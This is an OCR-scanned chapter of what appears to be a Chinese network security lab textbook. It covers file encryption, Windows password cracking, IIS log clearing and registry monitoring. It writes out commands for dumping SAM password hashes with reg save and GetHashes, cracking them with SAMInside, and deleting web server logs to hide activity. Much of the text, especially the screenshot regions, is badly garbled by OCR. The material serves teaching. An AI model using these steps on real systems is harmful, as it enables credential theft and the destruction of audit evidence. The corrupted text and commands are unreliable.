步骤 5: 在 果 面 新 建 一 个 名 称 为 text. txt 的 文档 (文档 名 目 定 ) ,输入 一 些 信 息 ( 如 输入 
test) ,并 进行 保存 ,如 图 2-4 所 示 。 


步骤 6: 在 Idoo File Encryption 运行 界面 中 选择 Lock Files Add Files 选项 ,添加 刚 
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2-4 ”创建 一 个 内 容 和 名 称 都 为 test BJ. txt 文档 
A gam test. txt 文档 。 


步骤 T: 单 击 Lock Files 按钮 ,开始 对 text. txt 文件 进行 加 密 , 如 图 2-5 所 示 。 


—— 


Kj 


—Á 
| 回 | Lock Data > Lock Files 


6 CE SUR TCR REIN. RIT UE "Lock Files" button to complete the operation of 
locking files. 


EIE 


idoo File Encryption Free 5.6 


p — 
gH HB 
Add Files Remove Files Clear Files 


[e — 1 71  fJI 1 1 o 3$  )|Stt 


[V] C: Documents and Settings Administrator RO Ntest.txt Normal 


Select: None Al AllLocked All Normal 


em | ee 


2-5 ”对 文件 进行 加 密 操作 


如 果 出 现 如 图 2-6 所 示 的 提示 信息 ,说 明 该 文件 已 经 加 密 ( 上 锁 )。 


步骤 8. 通过 以 上 加 密 操 作 后 , 当 再 次 打开 test. txt 文件 时 ,将 会 出 现 如 图 2-7 所 示 的 
提示 信息 ,说 明 该 文件 已 经 被 加 密 ,无 法 直接 访问 。 


Information 


E 


- The selected files have been locked, so nobody can access them without 
password! 


EE 


图 2-6 文件 成 功 加 密 后 的 提示 信息 图 2-7 拒绝 访问 提示 信息 


2.1.4 任务 与 思考 


Windows 操作 系统 提供 了 如 下 加 蜜 方式 。 


(1) 利用 组 策略 工具 把 存放 隐私 资料 .重要 文件 的 硬盘 分 区 设置 为 授权 访问 方式 。 
(2) 利用 注册 表 中 的 设置 ,把 某 些 驱动 希 设 置 为 隐藏 。 
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(3) 利用 Windows 目 带 的 “磁盘 管理 ?组 件 也 可 以 实现 便 盘 隐藏 。 
(4) 利用 WinRAR 等 工具 可 以 比较 安全 地 为 用 户 的 数据 进行 加 密 。 
(5) 利用 EFS 加 密 和 解密 。 

(6) 利用 Bitlocker 加 密 Windows 系统 中 的 数据 。 

CÓ 利用 其 他 工具 进行 加 密 。 

请 读者 通过 实验 ,分 别 擎 握 以 上 几 种 文件 加 蜜 方式 。 


2.2 Windows 口令 破解 


在 Windows 操作 系统 中 ,用 户 账 户 的 安全 管理 使 用 了 安全 账号 管理 需 (Security 
Account Manager,SAM) 机 制 。 实 现 对 SAM 文件 的 管理 是 确保 Windows 系统 账户 安全 的 
基础 。 


2.2.1 预备 知识 : 获取 SAM 文件 的 内 容 


在 Windows 操作 系统 启动 后 ,因为 SAM 文件 开始 被 系统 调用 ,所 以 无 法 直接 复制 。 
但 是 可 以 使 用 reg save hkImNsam sam. hive 命令 先 将 SAM 文件 备份 后 再 进行 复制 ,然后 再 
利用 一 些 工 具 软 件 破 解 SAM 文件 的 内 容 。 沼 用 的 SAM 破解 工具 软件 主要 有 LC5、 
IOphtcrack, WMIcrack, SMBcrack 等 。 

当 用 户 忘 记 了 Windows 的 登录 密码 时 ,可 以 先进 入 Windows 安全 模式 或 借助 
Windows PE 工具 进入 系统 ,然后 删除 系统 盘 目 录 下 的 SAM 文件 , 当 重 新 启动 系统 时 可 重 
A Windows 的 登录 密码 。 

SAM 是 Windows 的 用 户 账户 数据 库 , 所 有 系统 用 户 的 账户 名 称 和 对 应 密码 等 相关 信 
息 都 保存 在 这 个 文件 中 。 其 中 ,用 户 名 和 口令 经 过 Hash 变换 后 以 Hash 列表 形式 保存 在 % 
SystemRoot\system32\config 文件 夹 下 的 SAM 文件 中 。 在 注册 表 中 ,SAM 文件 的 数据 保 
存在 HKEY LOCAL MACHINENSAMNSAM 和 HKEY LOCAL MACHINENSecurityN 
SAM 分 文 下 ,默认 情况 下 被 隐藏 。 

由 于 SAM 文件 的 重要 性 ,系统 默认 会 对 SAM 文件 进行 备份 。 对 于 Windows Vista 之 
前 的 系统 ,SAM 备份 系统 存放 在 % SystemRoot%ANrepair XLR F. XF Windows Vista 
及 其 之 后 的 系统 ,SAM 备份 文件 存放 在 %SystemRoot%\system32\config\RegBack 文件 
夹 下 。 

GetHashes 是 InsidePro 公司 早期 的 一 蒜 Hash 密码 获取 软件 ,可 以 获取 Windows 系 
统 的 Hash 密码 值 。 另 外 ,该 公司 还 有 SAMInside, PasswordsPro 及 Extreme GPU 
Bruteforcer 3 款 密 码 破 解 软件 。GetHashes 命令 使 用 的 格式 为 


GetHashes [System key file] or GetHashes $ Local 
其 中 ,一 般 使 用 “GetHashes $ Local” 获 取 系 统 的 Hash 密码 值 ,该 命令 仅 在 System 权限 下 
才能 执行 。 

多 数 的 Windows 密码 恢复 软件 都 是 将 Windows 用 户 密码 重 置 ,而 SAMInside 则 是 将 
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用 户 密码 以 可 阅读 的 明文 方式 破解 出 来 ,而 且 SAMInside 可 以 使 用 分 布 式 攻击 方式 ,同时 
使 用 多 台 计 算 机 进行 密码 的 破解 ,大 大 提高 了 破解 速 度 。 


2.2.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,使 读者 重点 掌握 以 下 的 内 容 。 


(D 学 习 Windows 口令 破解 的 原理 。 

(2) 熟练 使 用 Windows 口令 破解 工具 破解 SAM 文件 。 

2. 实验 清单 及 软 硬 件 要 求 

本 实验 需要 一 台 运 行 Windows Server 2003 的 计算 机 ,通过 实验 恢复 该 操作 系统 


Administrator 的 登录 密码 。 在 具体 实验 之 前 ,需要 在 该 计 算 机 上 安装 Java 环境 。 另 外 ,还 
需要 准备 Hash 密码 获取 软件 GetHashes 和 Windows 密码 破解 (恢复 ) 软 件 SAMInside。 


2.2.3 实验 过 程 


在 进行 具体 的 实验 之 前 ,需要 将 事先 准备 的 软件 GetHashes M SAMInside 复制 到 系统 
指定 的 文件 夹 中 ,本 实验 为 D: NtoolsN X £E3 , 

步骤 1. 登录 Windows Server 2003 操作 系统 。 

步骤 2: 选择 “开始 ”一 “运行 ”命令 ,在 出 现 的 对 话 框 中 输入 “cmd” 命 令 , 进 入 命令 提示 
从 操作 窗口 。 

步骤 3: 切换 到 D:\tools\ 文 件 夹 。 

步骤 4: 使 用 命令 “Gethashes. exe $1ocal” 获 取 本 地 SAM 表 , 如 图 2-8 所 示 。 


TT C: MINDOYSAsysten32lcmd. exe 


D:Ntools?GetHashes.exe $1ocal 
hdministrator:588:44EFCE1640B921CA 00 D3B435B51404EE : 32ED87BDB5FDC5E9 CBA6885 4737681 
SD4::: 

uest:581 :AAD3B435BS51404EEANAD3B435BS1404EE: 31 D6 CFEBD168h E931B73C59 D7EBCB89 CB: : : 


图 2-8 获取 本 地 SAM X 
步骤 5. 使 用 命令 “Gethashes. exe $ local > dump. txt" f£ SAM KFA dump. txt X 
件 ,如 图 2-9 所 示 。 


cx C: MINDOTSAsystem32Vcnd. exe 


D:Ntools»GetHashes.exe $1ocal > dump.txt 


D:*stools»? 


图 2-9 将 SAM X A dump. txt 文件 


步骤 6: 切换 到 SAMInside 的 文件 夹 Di NtoolsNVsaminside. v2. 6. 1. 0. chs, 如 图 2-10 
所 示 。 


目 Charset. txt 

图 Deseript. ion 

E) ti story, Eng. txt 
History Rus. txt 
[&) Russi an. kbt 

EP SMInsi de. chm 
(E) SAMInsi de. DIC 
iecur exe 


pe INI. Dictionaries 
[E] SAMInsi de. key 

D Exsica E 

下 载 安装 说 明 . txt 


` 
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S D: itoolsisaminside. v2.6.1.0. chs 


DICTIONARIES ti 
KEY Ari 
Internet 快捷 方式 
文本 文档 


2013-5-10 10:46 
2013-5-10 10:46 
2013-5-10 10:46 
2007-2-8 20:21 

2007-8-20 23:12 
2007-8-12 17:32 
2007-8-12 17:40 
2006-3-24 19:00 
2007-5-30 21:06 
2010-9-22 8:48 

2007-8-12 17:27 
2013-5-10 10:46 
2013-5-10 10:46 
2010-9-22 23:04 
2007-8-12 18:36 
2006-7-20 22:26 
2007-10-19 9:41 


PEG eem E e 
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2-10 SAMInside 工具 的 组 成 文件 


步骤 7: 双击 SAMInside. exe 文件 ,打开 如 图 2-11 所 示 的 SAMInside 工具 操作 窗口 。 


T SANInside 


_ Administrator 
[Guest 
L]Helpassistant. 

L] suPPORT. 38894520. 
LIE vmware. -user. 


t — ey 
— — — 


1000 
1002 
1012 
500 —  — WWHOME 
501 


1000. 
1002 


1012 
1014 


| WWHOME 
123 
nmm??? 
< 禁用 > 


E d 


123 


| mmnnnm 


EE 
p > 


pee 


memmen 
mnm 


—— 


mere 


 wwhome 
123 


meme 
mmm 
mme 


Omer? 


i 1B255DE1EbEBE70277A... 


EE 


j5DE1EBE70277A... A288: 
CCF9155E3E7DB453A... 3DBD 
2078F1FD5A93D3F3F... 
000000000000000000... 
000000000000000000... 


mm rr n t tm rm ter O i 


18255DE1EBE70277A... 


-~ 一 -~ 一 一 -= 一 ,一 一 一 一 一 一 一 一 一 一 一 一 


CCF9155E3E7DB453A.. 


| 2078F1FD5A93D3F3F... 8FFE: 
| 000000000000000000... A523t 


dt —À MÀ € M 


.000000000000000000.,. 030C: 


|, 624AAC413795CDC1... 


2-11 SAMImnside 工具 操作 窗口 


步骤 8: 选择 "文件 ”一 “从 PWDUMP 文件 导入 ”选项 ,如 图 2-12 所 示 。 
步骤 9: 在 弹出 的 选择 PWDUMP file 的 窗口 中 ,选取 在 图 2-9 中 生成 的 dump. txt 
文件 。 
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SAlBBInside 


使 用 Lass 导入 本 地 用 户 


M LS 文件 导入 


从 未 二 文件 导入 
从 LIST SEP... 


导出 已 找到 | 的 密码 0D).. 
统计 输出 G)... 


退出 @) 


2-12. ”选择 “文件 ”一 


步骤 10; 
恢复 ,如 图 2-13 所 示 。 


Kw! IET 


ES 从 swn 和 syst 注册 表 文件 导入 CD) 
从 SMI 注册 表 文 件 和 用 系统 窗 钥 文件 导 六 站 ). 


使 用 计划 | 任务 导入 本 地 用 户 W 


i] 导出 用 户 到 pw wi E)... 


导出 选 定 用 户 到 PRDUMP wit D 


da 用 ;0 员 格 式 导出 用 户 D... 
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Ctrl+0 


Ctrl+S 


. wwhome 


| 123 
mmm 
?77??????77?37 


——————— 


meme 


. wwhome 


| 1B25SDE1EBE70277... 


一 -一 一 -rr 一 一 


| CCF9155E3E7DB453A... 


2078F1FD5A93D3F3F... 
000000000000000000... 
000000000000000000. ,， 


1e255DEIEBE70277A 


123 


 T????????????? 
meme 


(7)? ?2?2 2227? 
2277??? 


CCF9155E3E7DB453A.. 
2078F1FD5A93D3F3F... 


| 000000000000000000... 


一 -一 ced mm ED 


000000000000000000... 


一 一 -一 一 -一 -一 一 一 一 一 


624AAC413795CDC1... 


“从 PWDUMP 文件 导入 ?选项 
然后 ,Windows Server 2003 操作 系统 中 Administrator 用 户 账 号 的 密码 将 被 


— vmware, user 


DlHelpassistant 
[C SUPPORT 388945a0 - 


| LLvmware user . 


| | 2????????????? 


| WWHOME — 


[123 u 
np 


| ????????????? 


| 0 p?PM?P?M????? O 
 wwhome 


[123 


(2????2?2222?2? 


|?????????????? 


 2078FiFDSA93D3F3F.. 8FF - 


D00000000000000000... AS; - 


puran 


= 000000000000000000... | 03t 


1B255DE1bEBE702774A... A2 


一 一 "一 一 ~ 一 一 ~ 一 一 一 ~~~- 一 -一 一 -一 


CCF9155E3E7DB453A... 3D 


Ade red Braten m LAG Wu 


2078F1FD5A93D3F3F.. 


000000000000000000... AS. 


| EETLORTIC? 


000000000000000000... 


2?22???. 


memet 


| AAD3B435 


624A4AC413795CDC1... 


AAD3B435B51404EEA... 31[ 


BRE 6l 


2-13 ”显示 已 经 被 破解 (恢复 ) 的 Administrator 用 户 账 号 的 登录 密码 


2.2.4 任务 与 思考 


在 完成 本 实验 的 基础 上 ,请 读者 继续 学 习 以 下 的 内 容 , 掌 握 Windows 操作 系统 中 有 关 


Hash 密码 的 相关 知识 。 


1. Windows 操作 系统 下 的 Hash 密码 格式 


Windows 操作 系统 下 的 Hash 密码 格式 为 : 用 户 名 称 为 RID; LM-Hash 值 为 NT-Hash 


值 。 例 如 : 
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Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC 


其 中 ,用 户 名 称 为 Administrator; RID 为 500; LM-Hash 值 为 C8825DB10F2590EAAAD- 
3B435B51404EE; NT-Hash fü Jy 683020925C5D8569C23AA724774CE6CC, 

2. Windows 操作 系统 下 LM-Hash 值 的 生成 原理 

Windows 操作 系统 下 Hash 值 的 生成 有 一 定 的 规则 。 假 设 Windows 操作 系统 登录 口 
令 的 明文 是 Welcome, 当 Windows 操作 系统 将 其 生成 Hash 值 时 ,需要 通过 以 下 5 个 步骤 
的 转换 。 

步骤 1: 将 原来 的 明文 口令 Welcome 全 部 转换 成 大 写字 符 串 WELCOME; 

步骤 2: 将 步骤 1 中 生成 的 大 写字 符 串 转换 为 二 进 制 串 , 即 : 


WELCOME—57454C434F4D4500000000000000 


提示 : 读者 可 以 将 明文 口令 复制 到 UltraEdit 编辑 器 中 ,使 用 二 进 制 方式 查看 , 即 可 获 
取 口 令 的 二 进 制 串 。 

步骤 3: 如 果 明 文 口 令 经 过 大 写 变 换 后 的 二 进 制 字符 串 不 足 14B, 则 需要 在 其 后 添加 
0x00 补足 14B。 然 后 将 14B 的 二 进 制 字符 串 分 成 两 组 7B 的 数据 ,分别 经 str_to_key() 困 数 
处 理 得 到 两 组 8B 数据 。 


57454C434F4D45 经 str to key() 处 理 后 得 到 56A25288347A348A 
00000000000000 经 str_to_key( ) 处 理 后 得 到 0000000000000000 


步骤 4: 这 两 组 8B 数据 将 作为 DESKEY 对 魔术 字符 串 “KGS! @ H $ %” 进 行 标准 
DES 加 密 , 且 “KGS! @ # $%” 对 应 4B47532140232425。 其 中 ， 


56A25288347A348A 对 4B47532140232425 进行 标准 DES 加 密 得 到 C23413A8A1E7665F 
0000000000000000 对 4B47532140232425 进行 标准 DES 加 密 得 到 AAD3B435B51404EE 


步骤 5: 将 加 密 后 的 这 两 组 数据 简单 拼接 ,就 得 到 了 最 后 的 LM Hash, Bl 


LM Hash: C23413A8A1E7665FAAD3B435B51404EE 


3. Windows 操作 系统 下 NTLM Hash 值 的 生成 原理 

由 于 IBM 设计 的 LM Hash 算法 存在 应 用 上 的 缺陷 ,因此 微软 公司 在 该 算法 的 基础 上 ， 
提出 了 NTLM Hash 算法 。NTLM Hash 算法 在 兼容 LM Hash 算法 的 同时 增加 了 一 些 安 
全 机 制 , 下 面 对 Windows 操作 系统 下 NTLM Hash 值 的 生成 厚 理 进行 描述 。 

假设 Windows 操作 系统 登录 的 明文 口令 是 “123456”, 在 生成 NTLM Hash 时 进行 如 下 
两 步 的 运算 。 

步骤 1. 将 明文 口令 “123456” 转 换 为 Unicode 字符 串 。 


123456 一 310032003300340035003600 
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这 一 步 与 LM Hash 算法 不 同 , 不 需要 添加 0x00 补足 到 14B。 另 外 ,从 ASCI 字符 串 
转换 为 Unicode 编码 的 字符 串 时 ,使 用 little-endian 序 ( 即 低位 字 节 排放 在 内 存 的 低地 址 
端 ,高 位 字 节 排放 在 内 存 的 高 地 址 端 ) ,微软 公司 在 设计 整个 SMB 协议 时 就 没 考虑 过 big- 
endian 序 ( 即 高 位 字 节 排放 在 内 存 的 低地 址 端 ,低位 字 节 排放 在 内 存 的 高 地 址 端 ) ,ntoh * O, 
hton * () 函 数 不 宜 用 在 SMB 报 文 解码 中 。0x80 之 前 的 标准 ASCI 码 转 换 为 Unicode 码 ， 
就 是 简单 地 从 0x?? 变 成 0x00??。 此 类 标准 ASCI 字符 串 按 little-endian 序 转换 为 
Unicode 字符 串 ,就 是 简单 地 在 每 个 原 有 字 节 之 后 添加 0x00。 

步骤 2: 对 所 获取 的 Unicode 串 进 行 标准 MD4 单 回 Hash 运算 ,无论 数据 源 有 多 少 字 
节 ,MD4 固定 产生 128b 的 哈 希 值 。16B 310032003300340035003600 进行 标准 MD4 单 向 
哈 希 运算 后 得 到 32ED87BDB5FDC5E9 CBA88547376818D4, 这 就 是 NTLM Hash 的 值 。 

与 LM Hash 算法 相 比 ,明文 口令 大 小 写 敏 感 , 无 法 根据 NTLM Hash 判断 原始 明文 口 
令 是 否 小 于 8B, 摆 脱 了 魔术 字符 串 "KGS! Q9 28 $ %"。 对 于 MD4 而 言 , 如 果 采 用 穷 举 方法 
获取 明文 ,难度 较 大 。 


2.3 IIS 日 志 分 析 : 手动 清除 IIS 日 志 


系统 日 志 是 记录 系统 中 人 硬件 .软件 和 系统 运行 状态 的 信息 ,同时 还 可 以 记录 和 监视 系统 
中 发 生 的 事件 。 计 算 机 系统 日 志 主 要 提供 系统 和 网 络 状态 的 信息 报告 。 和 侵 者 通过 删除 或 
复 改 系统 日 志 销 毁 或 迷惑 被 攻击 系统 上 的 操作 记录 ,最 终 衙 避 系 统管 理 员 和 专业 人 员 的 追 
蹊 、 审 计 和 取证 。 因 此 ,系统 日 志 对 于 保护 计算 机 系统 软 人 硬件 黄 源 具有 不 可 和 奉 代 的 作用 , 它 
的 安全 直接 关系 到 计算 机 系统 的 安全 。 


2.3.1 预备 知识 : 日 志 的 功能 


操作 系统 的 日 志 是 一 种 非常 关键 的 服务 组 件 ,因为 系统 日 志 通 常会 记录 一 些 操 作 内 容 ， 
可 以 让 用 户 充 分 了 解 系统 的 运行 环境 ,这 些 信息 不 但 对 网 络 管理 人 员 非 党 有 用 ,而 且 对 网 络 
攻击 者 也 很 有 价值 。 例 如 , 当 攻 击 者 对 系统 进行 了 IPC 探测 时 ,系统 就 会 将 攻击 者 使 用 的 
IP 地 址 .时 间 ,用户 名 等 信息 记录 在 安全 日 志 中 ; 再 如 , 当 攻 击 者 尝试 进行 了 FTP 探测 后 ， 
攻击 者 的 IP 地 址 时间、 用 户 名 等 信息 将 记录 在 FTP 日 志 中 ; 等 等 。 这 些 日 志 信 息 , 对 于 
系统 管理 员 来 说 是 了 解 安 全 隐患 并 进行 系统 安全 加 固 的 依据 ,而 对 于 攻击 者 来 说 ,日 志 中 记 
录 着 用 于 骏 露 攻击 行为 的 痕迹 。 

Windows 操作 系统 提供 了 系统 日 志 、 应 用 程序 日 志和 安全 日 志 。 其 中 ,系统 日 志 用 于 
跟踪 记录 各 种 系统 事件 ; 应 用 程序 日 志 记 录 由 应 用 程序 或 系统 产生 的 事件 ,如 应 用 程序 产 
生 的 装载 动态 链接 库 (dll) 失 败 的 信息 都 将 被 记录 在 该 日 志 中 ; 安全 日 志 记 录 登 录 、 打 开 或 
关闭 网 络 改变 访问 权限 、 系 统 启动 或 关闭 事件 ,以 及 与 创建 ,打开 或 删除 文件 等 资源 使 用 相 
关联 的 事件 。 

Windows 操作 系统 有 许多 应 用 程序 的 活动 需要 进行 记录 。 对 于 大 多 数 长 时 间 不 间断 
运行 的 服务 而 言 ,日志 既是 管理 员 了 解 系 统 运行 情况 的 最 重要 途径 之 一 ,也 是 发 现 和 定位 故 
障 的 第 一 手 资 料 。 
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需要 说 明 的 是 ,不 仅 Windows 操作 系统 提供 了 日 志 功 能 ,几乎 所 有 的 主流 操作 系统 LXX 
据 库 、 应 用 系统 都 提供 了 日 志 服 务 。 


2.3.2 实现 目的 和 条 件 


1. 实验 目的 

在 学 习 并 掌握 Windows 系统 中 IISCInternet Information Services ,互联 网 信息 服务 ) 安 
淡 与 配置 方法 的 基础 上 ,使 读者 通过 本 实验 学 习 IIS 日 志文 件 的 组 成 及 应 用 功能 ,和 车 握 TIS 
日 志 的 清除 方法 。 

2. 实验 清单 及 软 硬 件 要 求 


本 实验 采用 Windows Server 2003 服务 需 操 作 系 统 。 如 果 访 者 使 用 的 是 Windows XP 
等 果 面 操作 系统 ,实验 原理 与 此 类 似 , 但 操作 方法 有 所 差异 ,在 具体 实验 过 程 中 ,读者 可 参阅 
相关 操作 系统 的 使 用 指南 。 


2.3.3 实验 过 程 


步骤 1: 以 系统 管理 员 身 份 正常 登录 Windows Server 2003 服务 天 操作 系 统 ,进入 实验 
环境 。 
步骤 2: 查看 C:\WINDOWS\system32\LogFiles\W3SVC854941 中 的 日 志文 件 , 如 
图 2-14 所 示 。 


SE C- MIINDOTSNsysten32XLogFilesVIE3SVC854941 


xo aao zio HRW IAV Wo — |& 


大 小 | 关 型  — | 修改 日 其 
26B 文本 文档 2018 4 3:5 


2-14 查看 Windows Server 2003 日 志文 件 


步骤 3. 在 DOS 命令 提示 符 下 输入 “cd C; \ WINDOWS \ system32 \ LogFiles \ 
W3SVC854941” 命 令 ,切换 到 W3SVC854941 HRF. 

步骤 4: 输入 “net stop w3svc” 命 令 , 停 止 w3svc 服务 。 

步骤 5: 输入 “del x ”命令 ,删除 所 有 日 志文 件 。 

步骤 6: 输入 “net start w3svc” 命 令 , 启 动 w3svc 服务 。 

以 上 操作 过 程 如 图 2-15 所 示 。 

通过 以 上 操作 , 当 再 次 打开 W3SVC854941 目录 时 ,在 类 似 图 2-14 所 示 的 窗口 中 ,将 会 
发 现 日 志文 件 已 经 被 删除 。 
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A 
FP 
E 


5 命令 提示 符 1 
er agir chers ed 
Rahas C HEUS [L2 

卷 的 序列 号 是 88E7-1676 


C: WINDOWS ss vstem32\LogFiles 的 目录 


2018-06-04 83:51 «DIR»? 
83:51 «DIR? uu 
21:804 «DIR? Cluster 
805 : 02 «DIR» Shutdoun 


92:08 <DIR> W3SUC85 4941 
9 1 \ 文 件 8 字 节 


5 个 目录 12,491,5590,728 可 用 字 节 
: WINDOWS *ss ystem32 'NLogFiles»cd W3SUC85 4941 
ld uide Ub Publlshinr Goreiec ATA stop w3suc 


lorld Vide Web Publishing Service 服务 正在 停止 . 
Jorld Vide Web Publishing Service 服务 已 成 功 停止 。 


: WINDOWS ss ystem32 NLogFiles M38UC854941»5del *.* 
: WINDOWS ss uystem32 NLogFiles «438UC854941 «*. *, AE d ORTA C /ND? y 


: WINDOWS ss ystem32\LogFiles W3SUC854941> 


LRF a ) C: \WINDOWS\system32 
图 2-15 X} OS 服务 的 操作 过 程 


市 今 提 示 Hd 


2.3.4 任务 与 思考 


通过 本 实验 ,读者 可 以 考虑 这 样 一 个 问题 : 出 于 安全 考虑 ,在 提供 重要 服务 的 系统 中 如 
何 将 日 志 单 独 保存 和 加 强 管理 。 

针对 此 问题 ,具体 可 通过 修改 日 志文 件 的 存放 文件 夹 (必须 在 NTFS 分 区 中 ) 的 访问 权 
限 来 实现 。 一 般 情 况 下 ,对 于 Everyone 账户 可 只 分 配 “ 读 取 ” 权 限 , 对 System 账户 取消 “和 完 
全 控制 "和 “修改 ”权限 的 分 配 。 这 样 , 当 攻 击 者 试图 清除 Windows 日 志 时 ,就 会 被 拒绝 。 

由 于 攻击 者 容易 在 日 志文 件 中 留 下 操作 的 痕迹 ,因此 管理 员 可 以 通过 设置 入 侵 检 测 系 
Zi (Intrusion Detection Systems,IDS) 规 则 ,建立 系统 受到 入 侵 时 的 特征 库 , 通 过 将 系统 运 
行情 况 与 该 特征 库 进行 比较 ,判定 是 否 有 入 侵 行 为 改 生 。 入 侵 检 测 作 为 一 种 “主动 防御 ”的 
检测 技术 ,具有 较 强 的 实时 防护 功能 ,可 以 迅速 提供 对 系统 、 网 络 的 攻击 和 对 用 户 误 操 作 的 
实时 防护 ,在 预测 到 入 侵 企图 时 进行 拦截 ,或 者 提醒 管理 员 做 好 预防 。 


2.4 针对 注册 表 的 攻防 


注册 表 和 组 策略 是 Windows 操作 系统 提供 的 两 项 管理 功能 ,两 者 的 操作 方法 不 同 , 但 
实现 功能 大 部 分 相同 。 


2.4.1 预备 知识 : 了 解 注册 表 


从 用 户 的 角度 看 ,注册 表 系 统 由 注册 表 数 据 库 和 注册 表 编 辑 需 两 部 分 组 成 。 其 中 ,注册 
表 数 据 库 包括 SYSTEM. DAT fll USER. DAT 两 个 文件 。SYSTEM. DAT 用 来 保存 计算 
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机 的 系统 信息 ,如 安装 的 硬件 和 设备 驱动 程序 的 有 关 信 息 等 ; USER. DAT 用 来 保存 每 个 用 
户 特 有 的 信息 ,如果 面 设置 .墙纸 或 窗口 的 颜色 设置 等 。 注 册 表 编辑 需 (regedit. exe) 是 一 个 
专门 编辑 注册 表 的 程序 ,用 来 进行 注册 表 基 本 的 浏览 ,编辑 和 修改 。 注 册 表 的 架构 采用 的 是 
树 状 结构 。 

由 于 注册 表 的 重要 性 ,系统 管理 员 可 以 通过 加 固 注 册 表 提高 系统 的 安全 性 ,防止 攻击 者 
通过 修改 注册 表 破 坏 系 统 。 攻 击 者 在 入侵 目标 系统 后 通过 权限 提升 拥有 对 注册 表 的 修改 权 
限 ,再 通过 修改 注册 表 实 现 对 系统 的 攻击 或 为 下 一 次 攻击 做 好 准备 。 

1. 禁用 注册 表 编 辑 器 

在 Windows 系统 安装 结束 后 ,用户 可 以 使 用 注册 表 编 辑 工具 regedit. exe 对 注册 表 进 
行 修 改 ,存在 较 大 的 安全 隐患 。 对 于 提供 信息 服务 的 重要 系统 ,可 以 通过 禁止 用 户 使 用 注册 
表 编 辑 工具 提高 系统 的 安全 性 。 

2. 限制 对 注册 表 的 远程 访问 

由 于 注册 表 是 Windows 操作 系统 的 核心 ,而 且 默 认 情 况 下 所 有 安装 Windows 操作 系 
统 的 计算 机 注册 表 在 网 络 上 都 是 可 以 被 访问 的 ,因此 攻击 者 完全 可 以 利用 这 个 漏洞 对 目标 
主机 进行 注册 表 攻 击 ,如 修改 文件 关系 和 插 和 人 恶意 代码 。 为 了 保护 操作 系统 ,可 以 禁止 对 注 
册 表 的 远程 访问 ,其 具体 方法 是 在 本 地 “服务 ”列表 中 找到 Remote Registry 服务 ,将 其 “局 
动 类 型 ”设置 为 “禁用 ” 即 可 。 

3. 禁用 注册 表 的 启动 项 

一 些 恶 意 代码 或 攻击 程序 通过 注册 表 的 启动 项 (Run 值 ) 加 载运 行 。 出 于 安全 考虑 ,可 
以 在 注册 表 编 辑 器 中 依次 展开 HKEY _ LOCAL _ MACHINE \ Software V Microsoft V 
Windows\CurrentVersion\Run, 将 子 键 Run 的 权限 设置 为 *“ 读 取 ”, 取 消 对 “完全 控制 ”权限 
的 选择 。 


2.4.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 掌握 以 下 的 内 容 。 

(1) Filemon 软件 的 原理 和 使 用 方法 。 

(2) FileChangeNotify 软件 的 原理 和 使 用 方法 。 

(3) Regmon 软件 的 原理 和 使 用 方法 。 

2. 实验 清单 及 软 硬 件 要 求 

读者 可 以 在 Windows Server 2003 操作 系统 上 完成 本 实验 。 在 进行 本 实验 之 前 ,需要 
准备 和 部 署 以 下 软件 。 

(1) Filemon, Filemon 是 一 款 文 件 系 统 监视 软件 ,用 于 监视 应 用 程序 进行 的 文件 读 写 
操作 。 它 将 所 有 与 文件 相关 的 操作 (如 读 取 、 修 改 . 出 错 信息 等 ) 全 部 记录 下 来 ,并 允许 用 户 
对 记录 的 信息 进行 保存 .过 滤 .查找 等 。 

(2) FileChangeNotify, FileChangeNotify 是 一 款 文 件 修改 监视 软件 。 

(3) Regmon。 Regmon(Registry Monitor) 是 一 款 注册 表 数 据 库 监视 软件 。 
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在 本 实验 中 ,以 上 3 SX LR AXE AR RR ETE D:\tools 文件 夹 中 。 
2.4.3 实验 过 程 


步骤 1: 以 系统 管理 员 身 份 正常 登录 Windows Server 2003 操作 系统 。 

步骤 2: JEA D 4X tools FS filemon X fE3e , fe filemon. exe 文件 上 双击 执行 。 

步骤 3: 运行 filemon. exe 文件 后 ,该 文件 即 可 将 所 有 与 文件 相关 的 操作 全 部 记录 下 
来 ,选项 栏 依次 显示 为 序号 时间、 进程 .请求 .路 径 结果、 其 他 等 ,如 图 2-16 所 示 。 
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2-16 Filemon 工具 操作 界面 


步骤 4: 如 果 需 要 查看 相关 的 进程 ,可 以 在 选取 了 指定 进程 后 右 击 ,在 出 现 的 快捷 菜单 
中 选择 “进程 属性 ”选项 ,显示 如 图 2-17 所 示 的 信息 。 


图 2-17 查看 指定 进程 的 属性 


步骤 5: 双击 某 个 进程 ,可 以 打开 该 进程 所 在 的 文件 夹 , 如 图 2-18 所 示 。 

步骤 6: 复制 该 文件 夹 到 日 面 ,并 重 命名 (为 便于 实验 时 查看 )。 

步骤 7: 打开 DRK tools 文件 夹 ,找到 fileChangeNotify. exe 文件 ,在 其 上 双击 运行 ， 
并 选取 “开始 监视 ” 即 可 对 文件 进行 监视 。 这 时 ,读者 可 以 在 果 面 上 建立 一 个 新 的 文件 夹 , 随 
后 将 该 文件 夹 修 改 为 test. 然后 再 将 其 删除 。 这 样 , 所 有 操作 将 自动 显示 在 
FileChangeNotify 监视 窗口 中 ,如 图 2-19 所 示 。 
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EE. 成 功 ! 
， 目 录 名 : C:\Documents and Settings\Adninistrator\ 点 面 \ 新 建 


HE: C:\Documents and Şettings\Adaini str ator Md RET 
C: oements and Settines\Administrator tes 
TFR: C:\Documents and Settings Mdnini stretor LEE E 
C: [| Um Settings MAdministrator Rf test 
ERE : C:\Documents and Settings*Administrator \test 


| Li r \Documents and Settings *Administrator \test 
MEC 15-21- 3642011771-1665375341-1427767445-500\INF02 
acts SAT BRS. ; C: \Documents and Settings MAdministrator S (i) test 


2-19 FileChangeNotify 监视 窗口 中 显示 已 进行 的 文件 夹 操 作 


步骤 8: 打开 D 盘 tools Regmon 文件 夹 ,在 regmon. exe 文件 上 双击 运行 ,在 打开 的 如 
图 2-20 所 示 的 对 话 框 中 主要 查看 注册 表 信 息 。 
步骤 9. 双击 任意 进程 ,可 以 看 到 该 进程 所 在 注册 表 的 具体 位 置 ,如 图 2-21 所 示 。 
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图 2-21 显示 进程 所 在 注册 表 的 位 置 


2.4.4 任务 与 思考 


通过 本 实验 ,读者 需要 进一步 思考 和 学 习 常 用 注册 表 的 键 值 类 型 。 常 用 的 注册 表 键 值 
类 型 主要 有 以 下 几 类 。 
